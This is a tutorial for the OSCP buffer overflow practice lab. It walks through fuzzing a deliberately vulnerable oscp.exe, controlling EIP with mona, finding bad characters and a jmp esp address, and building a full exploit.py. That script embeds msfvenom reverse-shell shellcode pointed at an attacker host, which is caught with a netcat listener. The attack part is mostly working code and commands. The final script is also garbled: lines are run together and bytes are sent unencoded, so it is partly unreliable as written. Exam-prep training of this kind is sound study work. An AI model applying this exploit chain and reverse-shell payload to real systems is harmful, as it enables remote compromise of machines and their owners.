Buffer Overflow Prep OSCP

To start always run Immunity Debugger as Administrator

After that we go to >> File >> Open > Open the binary oscp.exe, then run the program with Run. Then we connect using netcat:

nc $ip_victim 1337

We execute the commandHELP and then OVERFLOW1 test,as a result, the following should appear OVERFLO1 COMPLETE

Mona Configuration

Once the program is running, in the field at the bottom of the Immunity Debugger window we execute the following:

!mona config -set workingfolder c:\mona\%p

Fuzzing

On your Linux machine we create a script called fuzzer.py with the code:

#!/usr/bin/env python3

import socket, time, sys

ip = "$ip_victima"

port = 1337
timeout = 5
prefix = "OVERFLOW1 "

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)

We run the script and wait for the server to crack, noting the highest number of bytes we send.

Crash Replication & Controlling EIP

We create the exploit.py file with the following content:

import socket

ip = "$ip_victima"
port = 1337

prefix = "OVERFLOW1 "
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")

Run the following command changing the value of "-l 2000", to the value at which the server crashed in Fuzzing

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000

Copy the output text and paste it into the variable "payload" of exploit.py

On windows, we run the oscp.exe binary again (we have to do this every time we are going to run the exploit.py).

The script should crash the server again, but this time in the command box type the following (changing the distance value to the same value with which you generated the previous pattern)

!mona findmsp -distance 2000

Mona should show us a window with logs, we would specifically look for the following one:

Copy the last number and paste it into the variable offset of exploit.py. The variable payload and the one of the retn we add BBBB

Restart oscp.exe and run the file. Now the EIP record should be 42424242

Finding Bad Characters

We generate a bytearray, removing the null byte (\x00) by default.

!mona bytearray -b "\x00"

Now we generate a string of bad characters identical to the bytearray with the following code:

for x in range(1, 256):
  print("\\x" + "{:02x}".format(x), end='')
print()

The same string is pasted as payload in exploit.py

Run the exploit.py script. When it crashes, we copy from the ESP registry the adress and use the following command in mona

!mona compare -f C:\mona\oscp\bytearray.bin -a <address>

A pop-up window will open indicating which are the bad charts but be careful, we only have to take the one following the previous one (\x00).

In this case we have the following possible bad chars: 00 07 2e 2f a0 a1

As we had previously taken 00, we should now take 07, so in the command box we would write

!mona bytearray -b "\x00\x07"

And we also have to remove it from the payload variable in the exploit.py.

What follows would be the same, run the exploit.py with the new payload, capture the ESP adress, compare the new bad chars and extract the one following the x07. This step should be repeated until the bad chars column does not show any more characters.

Finding a Jump Point

We would have to execute the following command that looks for all the "jmp esp" instructions without the characters we marked (our bad chars)

!mona jmp -r esp -cpb "\x00\x07\x2e\xa0"

As the program is a bit endian (Reverse) we should write the address in reverse, so that instead of staying \x62\x50\x11\xaf we should be left with \xaf\x11\x50\x62we update our variable retn =\xaf\x11\x50\x62 and also the variable padding = "\x90" * 16

Generate Payload

Now we generate our reverse shell using msfvenom specifying the bad chars so it doesn't include them

msfvenom -p windows/shell_reverse_tcp LHOST=$ip_atacante LPORT=6666 EXITFUNC=thread -b “\x00\x07\x2e\xa0” -f c

Then we paste it into the exploit.py payload so that it looks like this:

import socketip = "192.168.43.57"
port = 1337
prefix = "OVERFLOW1 "
offset = 1978
overflow = "A" * offset
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16
payload = ("\xba\xba\x45\x54\xb0\xdb\xc3\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
"\x52\x31\x56\x12\x03\x56\x12\x83\x54\xb9\xb6\x45\x54\xaa\xb5"
"\xa6\xa4\x2b\xda\x2f\x41\x1a\xda\x54\x02\x0d\xea\x1f\x46\xa2"
"\x81\x72\x72\x31\xe7\x5a\x75\xf2\x42\xbd\xb8\x03\xfe\xfd\xdb"
"\x87\xfd\xd1\x3b\xb9\xcd\x27\x3a\xfe\x30\xc5\x6e\x57\x3e\x78"
"\x9e\xdc\x0a\x41\x15\xae\x9b\xc1\xca\x67\x9d\xe0\x5d\xf3\xc4"
"\x22\x5c\xd0\x7c\x6b\x46\x35\xb8\x25\xfd\x8d\x36\xb4\xd7\xdf"
"\xb7\x1b\x16\xd0\x45\x65\x5f\xd7\xb5\x10\xa9\x2b\x4b\x23\x6e"
"\x51\x97\xa6\x74\xf1\x5c\x10\x50\x03\xb0\xc7\x13\x0f\x7d\x83"
"\x7b\x0c\x80\x40\xf0\x28\x09\x67\xd6\xb8\x49\x4c\xf2\xe1\x0a"
"\xed\xa3\x4f\xfc\x12\xb3\x2f\xa1\xb6\xb8\xc2\xb6\xca\xe3\x8a"
"\x7b\xe7\x1b\x4b\x14\x70\x68\x79\xbb\x2a\xe6\x31\x34\xf5\xf1"
"\x36\x6f\x41\x6d\xc9\x90\xb2\xa4\x0e\xc4\xe2\xde\xa7\x65\x69"
"\x1e\x47\xb0\x3e\x4e\xe7\x6b\xff\x3e\x47\xdc\x97\x54\x48\x03"
"\x87\x57\x82\x2c\x22\xa2\x45\x93\x1b\xad\x1b\x7b\x5e\xad\x32"
"\x20\xd7\x4b\x5e\xc8\xb1\xc4\xf7\x71\x98\x9e\x66\x7d\x36\xdb"
"\xa9\xf5\xb5\x1c\x67\xfe\xb0\x0e\x10\x0e\x8f\x6c\xb7\x11\x25"
"\x18\x5b\x83\xa2\xd8\x12\xb8\x7c\x8f\x73\x0e\x75\x45\x6e\x29"
"\x2f\x7b\x73\xaf\x08\x3f\xa8\x0c\x96\xbe\x3d\x28\xbc\xd0\xfb"
"\xb1\xf8\x84\x53\xe4\x56\x72\x12\x5e\x19\x2c\xcc\x0d\xf3\xb8"
"\x89\x7d\xc4\xbe\x95\xab\xb2\x5e\x27\x02\x83\x61\x88\xc2\x03"
"\x1a\xf4\x72\xeb\xf1\xbc\x93\x0e\xd3\xc8\x3b\x97\xb6\x70\x26"
"\x28\x6d\xb6\x5f\xab\x87\x47\xa4\xb3\xe2\x42\xe0\x73\x1f\x3f"
"\x79\x16\x1f\xec\x7a\x33")postfix = ""buffer = prefix + overflow + retn + padding + payload + postfixs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(buffer + "\r\n")
  print("Done!")
except:
  print("Could not connect.")

Exploit!

Configure netcat on listening port

nc -lvnp 6666

Execute the exploit.py and we should have our Reverse Shell.